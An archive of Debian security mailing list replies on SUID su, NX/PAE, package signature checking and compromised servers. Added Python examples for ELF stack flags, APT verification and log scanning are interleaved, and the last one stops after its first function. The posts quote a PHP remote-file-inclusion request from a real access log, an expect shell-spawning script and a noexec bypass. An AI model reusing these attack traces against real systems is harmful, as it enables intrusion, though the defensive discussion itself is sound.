Re: Command 'su' is not working in virtual console
On Fri, Dec 16, 2011 at 06:26:08PM +0100, Marko Randjelovic wrote:
> I have a very disturbing problem, so I hope someone will be in a situation to help me. As I said in the title, su is not working in the virtual console for any combination of from-to users. In gnome-terminal it is working. sudo is also working. When I type 'su', it's the same as if I just typed RETURN without any command, but the exit status is 1.

Last time this happened for me it turned out that su was not SUID root :-)

-- 
Marcin Owsiany porri...@debian.org http://marcin.owsiany.pl/
GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216

-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20111216192503.GB11387@beczulka
Re: non-executable stack (via PT_GNU_STACK) not being enforced
On Mon, Oct 11, 2010 at 11:08:04PM -0500, Boyd Stephen Smith Jr. wrote:
> On Monday, October 11, 2010 17:18:34 you wrote:
> > On 10/11/2010 12:21 PM, Boyd Stephen Smith Jr. wrote:
> > > What can be done to not disable page protections in the default kernel?
> >
> > Enable PAE. From what I understand, the features are not separable in the i386 kernel. You either suffer under PAE and get NX, or you suffer without NX and drop PAE.
>
> That's my understanding too. I was really asking about the default. Most of us would prefer the 1% performance hit over having an executable stack (and heap).

Then install -bigmem, reboot and be done.

Remember that Debian i386 targets more than beefy servers. In fact, it probably has a larger install base on Atom-based router boards, All-in-one PCs, and netbooks. And it might be non-obvious, but some CPUs (e.g. the one in my not-so-old laptop) don't support PAE, so making the default kernel use PAE would make debian unbootable on them.

Archive: http://lists.debian.org/20101012101045.ga3...@beczulka
Re: non-executable stack (via PT_GNU_STACK) not being enforced
On Tue, Oct 12, 2010 at 05:29:03AM -0500, Jordon Bedwell wrote:
> On Tue, 2010-10-12 at 11:10 +0100, Marcin Owsiany wrote:
> > And it might be non-obvious, but some CPUs (e.g. the one in my not-so-old laptop) don't support PAE, so making the default kernel use PAE would make debian unbootable on them.
>
> Because it's too hard to have ubiquity

What's ubiquity?

> run a script that checks if the processor supports PAE and then enable it by default if it does, right?

Enable what? Last time I checked, a given kernel image either uses PAE or not, there was no flag to control it.

Archive: http://lists.debian.org/20101012103542.gc3...@beczulka
Re: non-executable stack (via PT_GNU_STACK) not being enforced
On Tue, Oct 12, 2010 at 05:48:23AM -0500, Jordon Bedwell wrote:
> Last I checked there were ways of carrying multiple Kernels and enabling them on a need-be basis

Oh, sure. I'm just pointing out that the performance hit one experiences with PAE is not the only factor to take into consideration when making the decision whether to enable PAE in the default kernel. Indeed some installer support for kernel selection would be more than desirable in such a case.

Archive: http://lists.debian.org/20101012114254.gd3...@beczulka
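The thread is about whether a non-executable stack requested via PT_GNU_STACK is actually enforced, which depends both on the binary (its PT_GNU_STACK flags) and on the CPU/kernel (PAE plus NX on i386). The following is an added example, not code from the thread or from Debian: it reads the ELF program headers directly and reports the PT_GNU_STACK flags, and parses the "flags" line of /proc/cpuinfo for the pae/nx bits; the ELF images and the cpuinfo text it checks are constructed samples.

```python
"""Report whether an ELF binary asks for an executable stack (PT_GNU_STACK)
and whether the CPU advertises the pae/nx features the i386 kernel needs.

Added example; the ELF images and /proc/cpuinfo text below are constructed
in-memory samples, not real binaries or a real machine.
"""
import struct

PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4


def gnu_stack_flags(data: bytes):
    """Return p_flags of the PT_GNU_STACK program header, or None if absent."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    elf_class, elf_data = data[4], data[5]
    endian = "<" if elf_data == 1 else ">"
    if elf_class == 2:                                      # ELF64
        ehdr = struct.unpack(endian + "16sHHIQQQIHHHHHH", data[:64])
        phdr_fmt, flags_idx = endian + "IIQQQQQQ", 1
    elif elf_class == 1:                                    # ELF32
        ehdr = struct.unpack(endian + "16sHHIIIIIHHHHHH", data[:52])
        phdr_fmt, flags_idx = endian + "IIIIIIII", 6
    else:
        raise ValueError("unknown ELF class")
    phoff, phentsize, phnum = ehdr[5], ehdr[9], ehdr[10]     # same slots in both classes
    for i in range(phnum):
        off = phoff + i * phentsize
        ph = struct.unpack(phdr_fmt, data[off:off + struct.calcsize(phdr_fmt)])
        if ph[0] == PT_GNU_STACK:                           # p_type is always first
            return ph[flags_idx]
    return None


def stack_is_executable(data: bytes) -> bool:
    """True if the loader would map this binary's stack executable.

    Assumption: a missing PT_GNU_STACK header is treated as 'executable', which
    is how i386 Linux kernels of the period behaved (read implies exec)."""
    flags = gnu_stack_flags(data)
    return flags is None or bool(flags & PF_X)


def describe(data: bytes) -> str:
    """Human-readable summary in the same RWE notation readelf -l uses."""
    flags = gnu_stack_flags(data)
    if flags is None:
        return "no PT_GNU_STACK (executable stack by default)"
    rwe = "".join(c if flags & b else "-" for c, b in (("R", PF_R), ("W", PF_W), ("E", PF_X)))
    return "PT_GNU_STACK " + rwe


def cpu_flags(cpuinfo_text: str) -> set:
    """Feature set from the first 'flags' line of /proc/cpuinfo; on i386 the
    thread's point is that 'nx' is only usable when 'pae' is there too."""
    for line in cpuinfo_text.splitlines():
        if line.startswith("flags"):
            return set(line.split(":", 1)[1].split())
    return set()


def make_sample_elf(elf_class: int, stack_flags=None) -> bytes:
    """Constructed minimal ELF image: header plus one optional PT_GNU_STACK
    program header. Not runnable; it is just enough for the parser above."""
    phnum = 0 if stack_flags is None else 1
    if elf_class == 2:
        ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\0" * 8
        ehdr = struct.pack("<16sHHIQQQIHHHHHH", ident, 2, 62, 1, 0, 64, 0, 0,
                           64, 56, phnum, 64, 0, 0)
        phdr = b"" if stack_flags is None else struct.pack(
            "<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    else:
        ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\0" * 8
        ehdr = struct.pack("<16sHHIIIIIHHHHHH", ident, 2, 3, 1, 0, 52, 0, 0,
                           52, 32, phnum, 40, 0, 0)
        phdr = b"" if stack_flags is None else struct.pack(
            "<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    return ehdr + phdr


# constructed sample /proc/cpuinfo excerpt
SAMPLE_CPUINFO = "processor\t: 0\nflags\t\t: fpu vme de pse tsc msr pae nx lm\n"


def check_file(path: str) -> str:
    with open(path, "rb") as fh:
        return describe(fh.read())


if __name__ == "__main__":
    import sys
    for p in sys.argv[1:]:
        print(p, "->", check_file(p))
    with open("/proc/cpuinfo") as fh:
        print("cpu has:", sorted(cpu_flags(fh.read()) & {"pae", "nx"}))
```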
Re: /dev/shm/r?
On Mon, Jun 01, 2009 at 12:26:49PM +0200, Vladislav Kurz wrote:
> On Monday 01 of June 2009, Johann Spies wrote:
> >     spawn /bin/bash
> >     interact

Note that this seems to be a simple expect(1) script which runs a shell. Not necessarily an indication of anything apart from a possible attacker trying to exploit something using expect.
Re: How safely to stop using backports repo?
On Thu, May 28, 2009 at 01:20:25AM +0700, sthu.d...@gmail.com wrote:
> Good day, MARGUERIE. Thank You for Your reply:
> > Otherwise, you can `apt-get remove` them (plus --purge if you want to reset your configuration files) and re-install them: that way you'll use the main-repo version and you won't have security problems anymore.
>
> That decision I feared... Is there an automatic way that can give me a list of the packages that came from the backports repo?

<plug type="shameless">
you might want to have a look at apt-forktracer
</plug>
Re: [SECURITY] [DSA 1681-1] New Linux 2.6.24 packages fix several vulnerabilities
On Fri, Dec 12, 2008 at 11:37:35AM -0700, dann frazier wrote:
> On Fri, Dec 12, 2008 at 08:53:43AM +0000, Marcin Owsiany wrote:
> > On Thu, Dec 11, 2008 at 12:11:05PM -0700, dann frazier wrote:
> > > On Thu, Dec 11, 2008 at 06:49:59PM +0000, Dominic Hargreaves wrote:
> > > > On Thu, Dec 11, 2008 at 11:38:28AM -0700, dann frazier wrote:
> > > > > Yes - 2.6.18 is in stable, and as such will be security supported for at least another year. Minor/local DoS security issues in the kernel are very frequent, so updated packages are constantly in preparation. Preparing kernel updates is resource intensive so, unless there's a severe issue, etch users should expect 2.6.18 and 2.6.24 updates to be staggered.
> > > >
> > > > Yup, that's pretty much what I expected to hear; thanks for confirming. May I make a suggestion that you include a comment along these lines in the advisory texts? It would help reassure users that things haven't been forgotten about greatly.
> > >
> > > Yes, this has been a FAQ since the release of etchnhalf. I'll see about adding something to the text template. Does this look ok?
> > >
> > > Debian 'etch' includes linux kernel packages based upon both the 2.6.18 and 2.6.24 linux releases. All known security issues are carefully tracked against both packages and both packages will receive security updates until security support for Debian 'etch' ceases. However, given the high frequency at which low-severity security issues are discovered in the kernel and the resource requirements of doing an update, non-critical 2.6.18 and 2.6.24 updates will typically release in a staggered or leap-frog fashion.
> >
> > I'd suggest you add something more explicit, maybe:
> >
> >   [fashion], that is when higher-severity issues are fixed.
> >
> > or something similar.
>
> Well, I don't think that's what I mean. High-severity fixes will release as soon as possible - likely simultaneously.

Well, that is what I meant as well, but my English is apparently not good enough to express it.

I think there is a single fact that the reader should get from this: Low severity fixes often wait until there is a need for a high-severity fix.

Does that sound better?
Re: [SECURITY] [DSA 1681-1] New Linux 2.6.24 packages fix several vulnerabilities
On Sat, Dec 13, 2008 at 10:38:30AM +0100, Moritz Muehlenhoff wrote:
> On 2008-12-13, Marcin Owsiany <porri...@debian.org> wrote:
> > On Fri, Dec 12, 2008 at 11:37:35AM -0700, dann frazier wrote:
> > > On Fri, Dec 12, 2008 at 08:53:43AM +0000, Marcin Owsiany wrote:
> > > > On Thu, Dec 11, 2008 at 12:11:05PM -0700, dann frazier wrote:
> > > > > On Thu, Dec 11, 2008 at 06:49:59PM +0000, Dominic Hargreaves wrote:
> > > > > > On Thu, Dec 11, 2008 at 11:38:28AM -0700, dann frazier wrote:
> > > > > > > Yes - 2.6.18 is in stable, and as such will be security supported for at least another year. Minor/local DoS security issues in the kernel are very frequent, so updated packages are constantly in preparation. Preparing kernel updates is resource intensive so, unless there's a severe issue, etch users should expect 2.6.18 and 2.6.24 updates to be staggered.
> > > > > >
> > > > > > Yup, that's pretty much what I expected to hear; thanks for confirming. May I make a suggestion that you include a comment along these lines in the advisory texts? It would help reassure users that things haven't been forgotten about greatly.
> > > > >
> > > > > Yes, this has been a FAQ since the release of etchnhalf. I'll see about adding something to the text template. Does this look ok?
> > > > >
> > > > > Debian 'etch' includes linux kernel packages based upon both the 2.6.18 and 2.6.24 linux releases. All known security issues are carefully tracked against both packages and both packages will receive security updates until security support for Debian 'etch' ceases. However, given the high frequency at which low-severity security issues are discovered in the kernel and the resource requirements of doing an update, non-critical 2.6.18 and 2.6.24 updates will typically release in a staggered or leap-frog fashion.
> > > >
> > > > I'd suggest you add something more explicit, maybe:
> > > >
> > > >   [fashion], that is when higher-severity issues are fixed.
> > > >
> > > > or something similar.
> > >
> > > Well, I don't think that's what I mean. High-severity fixes will release as soon as possible - likely simultaneously.
> >
> > Well, that is what I meant as well, but my English is apparently not good enough to express it.
> >
> > I think there is a single fact that the reader should get from this: Low severity fixes often wait until there is a need for a high-severity fix.
> >
> > Does that sound better?
>
> Not quite, in case of an emergency release such as the vmsplice issue (where the exploit was posted in the wild) the low severity issues will rather be postponed to a followup DSA.

I don't think my sentence implies that they never wait _even_ longer than a high-severity fix. It just states that they wait.

Anyway, all I'm trying to achieve is make that FAQ entry easy to understand for a non-native English speaker.
Re: [SECURITY] [DSA 1681-1] New Linux 2.6.24 packages fix several vulnerabilities
On Thu, Dec 11, 2008 at 12:11:05PM -0700, dann frazier wrote:
> On Thu, Dec 11, 2008 at 06:49:59PM +0000, Dominic Hargreaves wrote:
> > On Thu, Dec 11, 2008 at 11:38:28AM -0700, dann frazier wrote:
> > > Yes - 2.6.18 is in stable, and as such will be security supported for at least another year. Minor/local DoS security issues in the kernel are very frequent, so updated packages are constantly in preparation. Preparing kernel updates is resource intensive so, unless there's a severe issue, etch users should expect 2.6.18 and 2.6.24 updates to be staggered.
> >
> > Yup, that's pretty much what I expected to hear; thanks for confirming. May I make a suggestion that you include a comment along these lines in the advisory texts? It would help reassure users that things haven't been forgotten about greatly.
>
> Yes, this has been a FAQ since the release of etchnhalf. I'll see about adding something to the text template. Does this look ok?
>
> Debian 'etch' includes linux kernel packages based upon both the 2.6.18 and 2.6.24 linux releases. All known security issues are carefully tracked against both packages and both packages will receive security updates until security support for Debian 'etch' ceases. However, given the high frequency at which low-severity security issues are discovered in the kernel and the resource requirements of doing an update, non-critical 2.6.18 and 2.6.24 updates will typically release in a staggered or leap-frog fashion.

I'd suggest you add something more explicit, maybe:

  [fashion], that is when higher-severity issues are fixed.

or something similar.
Re: [SECURITY] [DSA 1680-1] New clamav packages fix potential codeexecution
On Wed, Dec 10, 2008 at 03:26:46PM -0500, Jim Popovitch wrote:
> On Wed, Dec 10, 2008 at 15:10, Michael Tautschnig <[EMAIL PROTECTED]> wrote:
> > I guess only the volatile archive maintainers can help out.
>
> Yet they have been silent for several days now on this issue.

FTR there's been no response to my postgrey upload to volatile, either, for over two weeks now.

regards,
Re: secure execution of drivers
On Wed, Nov 19, 2008 at 12:18:57PM +0100, Dani d wrote:
> hello everybody. I recently had a problem with drivers of my pc. The driver of the wifi sometimes hung and the last time it broke my entire reiserfs file system and I've barely been able to recover. I would like to know if there is any way to run the drivers in some sort of secure environment so that if it fails or is compromised it does not affect the rest of the system

This is one of the goals of microkernel based operating systems such as GNU Hurd or Minix.

As for Linux, you can run Xen and have the wifi driver run in a separate driver domain. I never used xen for that particular purpose, so I can't help you with that, but some papers seem to say this is possible.

regards,
Re: md5 hashes used in security announcements
On Fri, Oct 24, 2008 at 03:12:20PM -0500, Raphael Geissert wrote:
> Bas Steendijk wrote:
> > 2 files with a colliding hash can only be made by someone who can influence the creation of the file (thus, someone inside debian). he can make a good and a bad version of a package with the same MD5, and the same size. for someone to make a file with the same hash without influence in the creation of the original file would be a preimage attack.
>
> Yeah, but remember that the bad version must also be a valid .deb file with something inside that does work; otherwise you may just be able to get some random stuff with the same file size and md5 sum but without any use.
>
> P.S. I'm not saying it is impossible (I actually don't know, but let's assume that it is), but chances aren't high.

It (generating good and bad package with colliding sum) is actually easier than one might think. The reason is that you can embed any kind of binary blob inside an executable and make the executable behavior dependent on the version of the blob. This is shown here for example: http://www.mscs.dal.ca/~selinger/md5collision/

It was explained nicely in the "two PostScript files with identical MD5 hash" demo, but I cannot find it now.
Re: [SECURITY] [DSA 1571-1] New openssl packages fix predictable random number generator
On Tue, May 13, 2008 at 02:06:39PM +0200, Florian Weimer wrote:
> It is strongly recommended that all cryptographic key material which has been generated by OpenSSL versions starting with 0.9.8c-1 on Debian systems is recreated from scratch.

Does openssh store the generation date in the SSH keypair? If so, then could some guru post a way to retrieve that?
Re: ping22: can not kill this process
On Thu, Jan 03, 2008 at 08:55:11PM -0500, Luis Mondesi wrote:
> And besides, noexec can't even stop executables anyway. That's the stupidest of flags for mount:
>
>     $ /lib/ld-linux.so.2 /usr/bin/printf '%s\n' foo
>     foo

I think some of the newer dynamic loaders do check noexec and refuse to circumvent it.
Re: Debian suggestion on File Deletion
Hi David,

Thanks for your suggestion,

On Wed, Dec 12, 2007 at 12:19:28PM -0800, David de Hilario Richards wrote:
> The system/administration section of the OS is password protected. This is a good protection against viruses etc that would attack the OS but maybe the Debian developers could include password protecting Emptying the Trash. So when you delete files, they would be sent to the Trash as always but if you want to empty it, a user password would be necessary. This would prevent harm from viruses even though I understand that Linux has very few of them. The same idea could be applied to the Terminal. The Terminal would ask for a password every time you would want to delete a file.

The problem is, a malicious program (virus, etc) does not need a Terminal or Trash to delete files. It just directly asks the operating system kernel to do that. The kernel obeys if (simplifying) the program is running as the user who owns the file to be deleted. This is often the case.

However, there is functionality called SELinux (Security Enhanced Linux if memory serves) which allows one to say specifically which programs are allowed to perform which actions. It makes it possible to restrict malicious programs from doing anything malicious. SELinux is available in the current stable release of Debian. Unfortunately, it is quite difficult to configure, and currently causes problems with programs which are not malicious as well. We hope to make it more useful in future Debian releases.

Regards,
Re: How to verify debian packages?
On Tue, Nov 06, 2007 at 06:04:40AM -0800, peterer wrote:
> When I manually download debian packages (from http://www.debian.org/distrib/packages), how can I verify that they have not been tampered with?

Individual packages are not signed, so you would basically need to manually repeat the process which APT uses for verifying package integrity:

- calculate package's MD5 and SHA sums
- look up the package in the Packages file, check they match, calculate the Packages(.gz) file's sums
- look that one up in a Release file
- verify Release file's signature: Release.gpg

You can find each of these files simply by browsing the archive tree.
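The four steps above, carried out by hand, as an added example (not code from the post, and not APT's own implementation): it walks the chain .deb -> Packages stanza -> Release hash list, reporting each link that fails, and delegates the final Release.gpg check to gpgv(1) with the archive keyring. The .deb, Packages and Release contents it runs against are constructed in-memory samples using the real field layout; on a mirror you would fetch the same files from the archive tree.

```python
"""Manual replay of APT's integrity chain for a hand-downloaded .deb.

Added example; the archive files below are constructed samples, not from
a real mirror. Only verify_release_signature() touches the real system
(it needs gpgv and the Debian archive keyring installed).
"""
import hashlib
import subprocess


def parse_packages(text: str) -> dict:
    """Map Filename -> field dict for every stanza of a Packages file."""
    stanzas = {}
    for block in text.strip().split("\n\n"):
        fields = {}
        for line in block.splitlines():
            if line[:1].isspace():            # continuation of a multi-line field
                continue
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
        if "Filename" in fields:
            stanzas[fields["Filename"]] = fields
    return stanzas


def parse_release(text: str) -> dict:
    """Map 'MD5Sum'/'SHA1'/'SHA256' -> {path: (hexdigest, size)} from a Release file.
    Hash entries are the indented ' <digest> <size> <path>' lines under each header."""
    sums, current = {}, None
    for line in text.splitlines():
        if not line.startswith(" "):
            key = line.split(":", 1)[0]
            current = key if key in ("MD5Sum", "SHA1", "SHA256") else None
            if current:
                sums[current] = {}
        elif current:
            digest, size, path = line.split()
            sums[current][path] = (digest, int(size))
    return sums


def verify_deb(deb: bytes, deb_filename: str, packages: bytes,
               packages_path: str, release: bytes) -> list:
    """Steps 1-3: return a list of failed links; an empty list means the chain holds."""
    failures = []
    stanza = parse_packages(packages.decode()).get(deb_filename)
    if stanza is None:
        return ["package %s not listed in Packages" % deb_filename]
    # step 1+2: the .deb's size and sums must match its Packages stanza
    if int(stanza["Size"]) != len(deb):
        failures.append("deb size mismatch")
    for field, algo in (("MD5sum", "md5"), ("SHA256", "sha256")):
        if field in stanza and hashlib.new(algo, deb).hexdigest() != stanza[field]:
            failures.append("deb %s mismatch" % field)
    # step 3: the Packages file itself must match its entry in Release
    sums = parse_release(release.decode())
    for algo, key in (("md5", "MD5Sum"), ("sha256", "SHA256")):
        entry = sums.get(key, {}).get(packages_path)
        if entry is None:
            failures.append("%s not listed under %s in Release" % (packages_path, key))
            continue
        digest, size = entry
        if size != len(packages) or hashlib.new(algo, packages).hexdigest() != digest:
            failures.append("Packages %s mismatch" % key)
    return failures


def verify_release_signature(release_path: str, sig_path: str,
                             keyring="/usr/share/keyrings/debian-archive-keyring.gpg") -> bool:
    """Step 4: check the detached Release.gpg against the archive keyring with gpgv(1)."""
    proc = subprocess.run(["gpgv", "--keyring", keyring, sig_path, release_path],
                          capture_output=True)
    return proc.returncode == 0


def build_sample_archive():
    """Constructed sample: one fake .deb plus a matching Packages and Release."""
    deb = b"!<arch>\nconstructed sample, not a real Debian package\n"
    deb_filename = "pool/main/e/example/example_1.0-1_i386.deb"
    packages = ("Package: example\nVersion: 1.0-1\nArchitecture: i386\n"
                "Filename: %s\nSize: %d\nMD5sum: %s\nSHA256: %s\n"
                % (deb_filename, len(deb), hashlib.md5(deb).hexdigest(),
                   hashlib.sha256(deb).hexdigest())).encode()
    packages_path = "main/binary-i386/Packages"
    release = ("Origin: Debian\nSuite: stable\nMD5Sum:\n %s %d %s\nSHA256:\n %s %d %s\n"
               % (hashlib.md5(packages).hexdigest(), len(packages), packages_path,
                  hashlib.sha256(packages).hexdigest(), len(packages), packages_path)).encode()
    return deb, deb_filename, packages, packages_path, release


def demo() -> dict:
    """Good chain, a tampered .deb, and a tampered Packages file side by side."""
    deb, name, packages, ppath, release = build_sample_archive()
    return {
        "good": verify_deb(deb, name, packages, ppath, release),
        "tampered_deb": verify_deb(deb + b"\x00", name, packages, ppath, release),
        "tampered_packages": verify_deb(deb, name, packages.replace(b"Size:", b"Size :"),
                                        ppath, release),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(case, "->", result or "OK")
```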
Re: verifying archive signature keys?
On Wed, Aug 15, 2007 at 10:54:02AM +0200, Hadmut Danisch wrote:
> Hi,
>
> just a question because someone had asked me for help. The problem was that apt-get update had complained about not being able to verify signatures due to a missing pgp key. Was easy to tell to do
>
>     gpg --recv-key A70DAF536070D3A1
>     gpg -a --export A70DAF536070D3A1 | sudo apt-key add -
>
> but: How would one verify that this key is the correct debian key (and not, e.g. the key used by an intruder to fake packages and simply uploaded to public key repositories)?
>
>     gpg --check-sigs A70DAF536070D3A1
>
> lists some signatures of several people, but none that I personally know, I don't even know whether these people actually exist. So what's the official way to verify debian archives?

I'm not sure if it's official, but I've seen a section on that topic on the debian wiki IIRC.
Re: security.d.o packages for etch built on sarge
On Wed, Jul 18, 2007 at 01:35:41PM +0100, Marcin Owsiany wrote:
> On Fri, Jul 13, 2007 at 12:08:35PM +0100, Marcin Owsiany wrote:
> > On Mon, Jul 02, 2007 at 07:27:13PM +0200, Moritz Muehlenhoff wrote:
> > > Marcin Owsiany wrote:
> > > > Why I haven't realized you're talking about my package up till now is a mystery to me. I'll check this ASAP.
> > > >
> > > > Indeed, it looks like I used wrong pbuilder tarball to build this one :-(
> > > >
> > > > Security team: this just needs a rebuild, but how exactly should I fix this? Can I do a bin-nmu so that other architectures don't need a rebuild? Or should I just prepare 1:1.7~rc2-1etch2 as a new revision and upload that?
> > >
> > > A binNMU has been done, a package is available at http://debian.netcologne.de/debian/pool/main/e/ekg/ekg_1.7~rc2-1etch1+b1_i386.deb
> > > It will also be part of the immediate stable point update.
> >
> > As far as I can see, it has not been uploaded to etch-security, which means it will only become available after the next point release. Can we do anything to speed this up?
>
> Sorry to bug you all, but is there any hope? Can I help? I know this is not critical priority, but I've been waiting for over two weeks now for any response on that.

Anyone?
Re: security.d.o packages for etch built on sarge
On Sat, Jun 30, 2007 at 08:32:20PM -0600, Jan Hetges wrote:
> On Sun, Jul 01, 2007 at 02:39:37AM +0100, Steve Kemp wrote:
> > On Sun Jul 01, 2007 at 00:59:24 +0200, Karol Lewandowski wrote:
> > > On Mon, Jun 25, 2007 at 02:56:07PM +0200, karol wrote:
> > > > It looks like etch's security updates were built on sarge. python2.3 isn't available in etch making ekg's security update uninstallable.
> > >
> > > I would be _very_ happy to hear _any_ comment on that. I'll probably ask debian-devel if I won't get any answer in next few days.
> >
> > Etch security updates *should* be built upon Etch. Sarge updates *should* be built upon Sarge. Anything else is liable to break and is a bug which should be fixed with an update.
> >
> > I've checked the build-logs I've got access to (all except i386) and they seem fine. is it just i386 you see this behavior upon? Do other people see this too, or is it a potentially broken system you're installing upon (I have to ask; some people still have mixed sources.lists files..)
>
> i just tried on a pretty fresh etch install (i386), error message is spanish, but i think understandable:
>
>     Los siguientes paquetes tienen dependencias incumplidas:
>       ekg: Depende: python2.3 (>= 2.3) pero no es instalable
>     E: Paquetes rotos
>
> so maybe someone should file grave? against ekg?

Why I haven't realized you're talking about my package up till now is a mystery to me. I'll check this ASAP.
Re: security.d.o packages for etch built on sarge
On Mon, Jul 02, 2007 at 10:19:25AM +0100, Marcin Owsiany wrote:
> On Sat, Jun 30, 2007 at 08:32:20PM -0600, Jan Hetges wrote:
> > On Sun, Jul 01, 2007 at 02:39:37AM +0100, Steve Kemp wrote:
> > > On Sun Jul 01, 2007 at 00:59:24 +0200, Karol Lewandowski wrote:
> > > > On Mon, Jun 25, 2007 at 02:56:07PM +0200, karol wrote:
> > > > > It looks like etch's security updates were built on sarge. python2.3 isn't available in etch making ekg's security update uninstallable.
> > > >
> > > > I would be _very_ happy to hear _any_ comment on that. I'll probably ask debian-devel if I won't get any answer in next few days.
> > >
> > > Etch security updates *should* be built upon Etch. Sarge updates *should* be built upon Sarge. Anything else is liable to break and is a bug which should be fixed with an update.
> > >
> > > I've checked the build-logs I've got access to (all except i386) and they seem fine. is it just i386 you see this behavior upon? Do other people see this too, or is it a potentially broken system you're installing upon (I have to ask; some people still have mixed sources.lists files..)
> >
> > i just tried on a pretty fresh etch install (i386), error message is spanish, but i think understandable:
> >
> >     Los siguientes paquetes tienen dependencias incumplidas:
> >       ekg: Depende: python2.3 (>= 2.3) pero no es instalable
> >     E: Paquetes rotos
> >
> > so maybe someone should file grave? against ekg?
>
> Why I haven't realized you're talking about my package up till now is a mystery to me. I'll check this ASAP.

Indeed, it looks like I used wrong pbuilder tarball to build this one :-(

Security team: this just needs a rebuild, but how exactly should I fix this? Can I do a bin-nmu so that other architectures don't need a rebuild? Or should I just prepare 1:1.7~rc2-1etch2 as a new revision and upload that?

Marcin
Re: security.d.o packages for etch built on sarge
I just built ekg 1:1.7~rc2-1etch2 which corrects the misbuilt 1:1.7~rc2-1etch1. I double-checked that the changes from 1:1.7~rc2-1 are minimal.

It is available as http://marcin.owsiany.pl/tmp/2007-07-02-ekg-1.7~rc2-1etch2.tgz so a member of the security team can either upload it directly, or let me know and I will do it.

If you'd rather have it built differently, please let me know.
Re: [SECURITY] [DSA 1289-1] New Linux 2.6.18 packages fix several vulnerabilities
On Sun, May 13, 2007 at 01:33:16PM +0200, Moritz Muehlenhoff wrote:
> CVE-2007-1496
>
> Michal Miroslaw reported a DoS vulnerability (crash) in netfilter. A remote attacker can cause a NULL pointer dereference in the nfnetlink_log function.

CVE says:

| nfnetlink_log in netfilter in the Linux kernel before 2.6.20.3 allows
| attackers to cause a denial of service (crash) via unspecified vectors
| involving the (1) nfulnl_recv_config function, (2) using multiple
| packets per netlink message, and (3) bridged packets, which trigger a
| NULL pointer dereference.

Could someone who knows netfilter a bit better comment on this? In what circumstances in real life is this exploitable? Is there any workaround? I'm not using bridging, I don't care about logging, so I'm happy to disable it, I'm not sure what that netlink thing means..

Marcin
Re: Mass update deployment strategy
On Mon, Nov 27, 2006 at 03:37:22PM -0500, George Georgalis wrote:
>     for n in host1 host2 hostz; do
>         ssh [EMAIL PROTECTED] "$ENV $UPD; $UPG $UPC"
>     done

Check out dsh and its option -c instead of this step :-)

Marcin
Re: a compromised machine
On Tue, Jul 26, 2005 at 04:39:20PM -0400, Edward Faulkner wrote:
> On Tue, Jul 26, 2005 at 10:02:52PM +0200, Nejc Novak wrote:
> > Can you get any information out of this cron file? I tried creating the same exec that this file creates, but obviously i was doing sth wrong :)
>
> The crontab writes out a binary file and executes it. I straced the binary on a virtual machine with no network. It's attempting to connect to two different hosts:
>
> 210.169.91.66:5454

This is an IRC server. The program seems to be an IRC zombie.

Marcin
Re: root login denied. But by what?
On Fri, Jun 17, 2005 at 07:33:02PM +0100, David Ramsden wrote:
> Does anyone know what generated the above log entries?

try:

    find /usr/sbin /sbin /usr/local/sbin \
         /usr/bin /usr/local/bin /bin /usr/lib /lib -type f | \
    while read -r f; do
        if strings "$f" | egrep -q 'no ip\?!'; then
            echo "it's $f !"
        fi
    done

And why is there no ip? I guess this is a bug..

Marcin
Re: apache / exe process taking 99 % cpu
On Wed, Sep 01, 2004 at 02:30:49AM +0200, Timo Veith wrote:
> apache access.log:
>
> 142.176.141.5 - - [29/Aug/2004:21:51:47 +0200] "GET /path/to/index.php?p=http://142.176.141.5:113/ HTTP/1.1" 200 2979 "-" "curl/7.10.3 (i686-pc-linux-gnu) libcurl/7.10.3 OpenSSL/0.9.7a zlib/1.1.4"
>
> The path is the same as the PWD env var, which I found in /proc/pid/environ of the bad process. Now this together with your description could maybe explain how it happened.

Check whether the index.php looks like something that was created by the attacker, or it is just a legitimate but buggy script file.

> How can I generally close this hole for now? I guess there is a setting in php.ini or so. I will take a look at it.

Probably there is a setting for this very feature that facilitated this exploitation (HTTP-enabled open() I guess). But there are two problems with that: new security implications of certain PHP features are discovered rather regularly, and many users depend on such features.

Actually allowing not-very-experienced programmers to run arbitrary code on your machine is the more general problem we are facing, for which there is no easy solution.

My current plan is to run PHP via suexec, so that I can easily find out which user's website was cracked. Then I would shut down the particular web page and tell the client to either fix it or say goodbye ]:->

Unfortunately I hear that there are some PHP features (something having to do with authentication) which don't work when PHP is not run as an Apache module, so I cannot migrate all users in a batch.

Generally, PHP is a little bit like a nightmare for me :-)

regards,
Marcin
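The access.log line quoted above is the tell-tale shape of a remote file inclusion: a script parameter whose value is an absolute URL, here pointing back at the requesting host itself. The following is an added example (not from the thread, and not a PHP or Apache component) that scans combined-format log lines for exactly that pattern, so an admin can spot which scripts and parameters were hit before deciding which php.ini feature to switch off. The first sample line is the one quoted above with its quotes restored; the other two are constructed. The php.ini setting the post is guessing at is allow_url_fopen, which exists and governs HTTP-enabled open(); mentioned in a comment as context, not as something the post names.

```python
"""Flag access-log requests whose query parameters carry a remote URL.

Added example, not from the list post. SAMPLE_LOG holds the thread's own
log line plus two constructed ones (RFC 5737 documentation addresses).
The php.ini knob the thread is guessing at is allow_url_fopen; turning it
off stops include()/fopen() from fetching http:// targets.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format; referer/user-agent are optional so common-format lines parse too
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def parse_line(line: str):
    """Return the log fields as a dict, or None for a line that is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


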